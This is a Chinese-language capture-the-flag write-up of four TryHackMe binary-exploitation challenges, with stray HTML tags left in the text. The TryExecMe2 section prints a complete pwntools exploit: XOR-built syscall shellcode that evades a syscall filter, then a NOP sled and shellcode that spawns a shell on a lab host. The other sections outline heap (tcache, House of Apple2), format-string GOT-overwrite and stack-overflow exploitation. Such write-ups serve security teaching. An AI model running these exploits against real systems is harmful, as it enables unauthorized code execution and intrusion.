TryHackMe Two 漏洞利用技术详解<\/h1>

TryExecMe2 分析<\/h2>

程序逻辑分析<\/h3>
程序会开辟一段可读可写可执行的区域 (RWX)<\/li>
向该区域读入0x80字节长度的字符<\/li>
通过forbidden函数检查，限制直接系统调用(syscall\/sysenter\/int 0x80)<\/li> <\/ol>
绕过限制的技术<\/h3>
使用异或操作生成syscall指令<\/li>
构造read系统调用进行二次写入<\/li> <\/ol>
利用步骤<\/h3>
第一阶段shellcode构造：<\/li> <\/ol>
shellcode =<\/span> asm("""
<\/span><\/span><\/span>    mov rdx, 0x100
<\/span><\/span><\/span>    mov r15, rdi
<\/span><\/span><\/span>    xor rdi, rdi
<\/span><\/span><\/span>    mov rsi, r15
<\/span><\/span><\/span>    mov cx, 0x454f
<\/span><\/span><\/span>    xor cx, 0x4040
<\/span><\/span><\/span>    mov [r15+0x1e], cx
<\/span><\/span><\/span>"""<\/span>)
<\/span><\/span><\/code><\/pre>这段代码会：<\/p>

设置读取长度为0x100<\/li>
保存原始rdi值<\/li>
清空rdi<\/li>
设置rsi为原始rdi值<\/li>
通过异或生成syscall指令并写入内存<\/li>
<\/ul>

第二阶段payload构造：<\/li>
<\/ol>
payload =<\/span> b<\/span>"<\/span>\x90<\/span>"<\/span>*<\/span>0x25<\/span> +<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span><\/code><\/pre>
使用NOP sled (0x90)填充<\/li>
添加获取shell的shellcode<\/li>
<\/ul>
完整利用代码<\/h3>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>from<\/span> pwncli import<\/span> *<\/span>
<\/span><\/span>
<\/span><\/span>context(os=<\/span>'linux'<\/span>, arch=<\/span>'amd64'<\/span>, log_level=<\/span>'debug'<\/span>)
<\/span><\/span>
<\/span><\/span>p =<\/span> remote("10.10.131.135"<\/span>, 5002<\/span>)
<\/span><\/span>
<\/span><\/span># 第一阶段shellcode<\/span>
<\/span><\/span>shellcode =<\/span> asm("""
<\/span><\/span><\/span>    mov rdx, 0x100
<\/span><\/span><\/span>    mov r15, rdi
<\/span><\/span><\/span>    xor rdi, rdi
<\/span><\/span><\/span>    mov rsi, r15
<\/span><\/span><\/span>    mov cx, 0x454f
<\/span><\/span><\/span>    xor cx, 0x4040
<\/span><\/span><\/span>    mov [r15+0x1e], cx
<\/span><\/span><\/span>"""<\/span>)
<\/span><\/span>
<\/span><\/span>p.<\/span>send(shellcode)
<\/span><\/span>pause()
<\/span><\/span>
<\/span><\/span># 第二阶段payload<\/span>
<\/span><\/span>payload =<\/span> b<\/span>"<\/span>\x90<\/span>"<\/span>*<\/span>0x25<\/span> +<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span>p.<\/span>send(payload)
<\/span><\/span>
<\/span><\/span>p.<\/span>interactive()
<\/span><\/span><\/code><\/pre>高级技巧<\/h3>
使用pwntools的encode模块避免特定字符：<\/p>
shellcode =<\/span> asm(shellcraft.<\/span>sh())
<\/span><\/span>encoded_shellcode =<\/span> encode(shellcode, avoid=<\/span>b<\/span>"<\/span>\x0f\xcd<\/span>"<\/span>)
<\/span><\/span><\/code><\/pre>TryaNote 分析<\/h2>
漏洞分析<\/h3>

delete函数指针free后未置零(UAF)<\/li>
libc 2.35移除了常见hook利用点<\/li>
<\/ol>
利用步骤<\/h3>


泄露libc和堆地址：<\/p>

申请大于0x400的堆块，free后进入unsorted bin<\/li>
通过show泄露libc地址<\/li>
free小堆块进入tcache，泄露堆地址(注意左移12位)<\/li>
<\/ul>
<\/li>

劫持tcache_struct：<\/p>

修改fd指向tcache_struct实现任意地址写<\/li>
写入特定结构：b"\x07\x00"*0x58 + b"\x00\x00"*8 + p64(_IO_list_all) + p64(heap_base+0x7e0)<\/code><\/li>
<\/ul>
<\/li>

House of Apple2利用：<\/p>

伪造fake_file结构<\/li>
修改_IO_list_all指向伪造结构<\/li>
利用程序退出时刷新IO流执行system("\/bin\/sh")<\/li>
<\/ul>
<\/li>
<\/ol>
NotSpecified2 分析<\/h2>
漏洞分析<\/h3>

格式化字符串漏洞<\/li>
GOT表可写<\/li>
程序执行一次后通过exit退出<\/li>
<\/ol>
利用步骤<\/h3>


劫持exit的GOT表：<\/p>

修改为_start实现无限循环利用<\/li>
<\/ul>
<\/li>

泄露libc基地址：<\/p>

通过格式化字符串泄露地址<\/li>
计算one_gadget偏移<\/li>
<\/ul>
<\/li>

最终利用：<\/p>

修改exit的GOT表为one_gadget<\/li>
获取shell<\/li>
<\/ul>
<\/li>
<\/ol>
SlowServer 分析<\/h2>
漏洞分析<\/h3>

服务器监听0.0.0.0:5555<\/li>
handle_request函数存在：

DEBUG方法：格式化字符串漏洞<\/li>
POST方法：栈溢出<\/li>
<\/ul>
<\/li>
<\/ol>
利用步骤<\/h3>


泄露基地址：<\/p>

通过格式化字符串泄露PIE基地址<\/li>
注意远程与本地栈差异(建议使用Ubuntu 22.04调试)<\/li>
<\/ul>
<\/li>

获取交互式shell：<\/p>

使用dup2(4, 0)和dup2(4, 1)重定向标准输入输出到套接字<\/li>
或者使用ORW(read\/open\/write)方式读取flag<\/li>
<\/ul>
<\/li>

快速定位远程基地址：<\/p>

编写fuzz脚本匹配末三位地址<\/li>
排除0x70-0x7f开头的地址<\/li>
<\/ul>
<\/li>
<\/ol>
总结<\/h2>
本文详细分析了四个不同的漏洞利用场景，涵盖了：<\/p>

shellcode绕过限制技术<\/li>
堆利用中的UAF和tcache劫持<\/li>
格式化字符串漏洞利用<\/li>
网络服务中的漏洞组合利用<\/li>
<\/ol>
每种场景都提供了详细的利用步骤和完整代码，关键点包括内存布局理解、绕过技术、地址泄露方法和最终利用链构造。<\/p>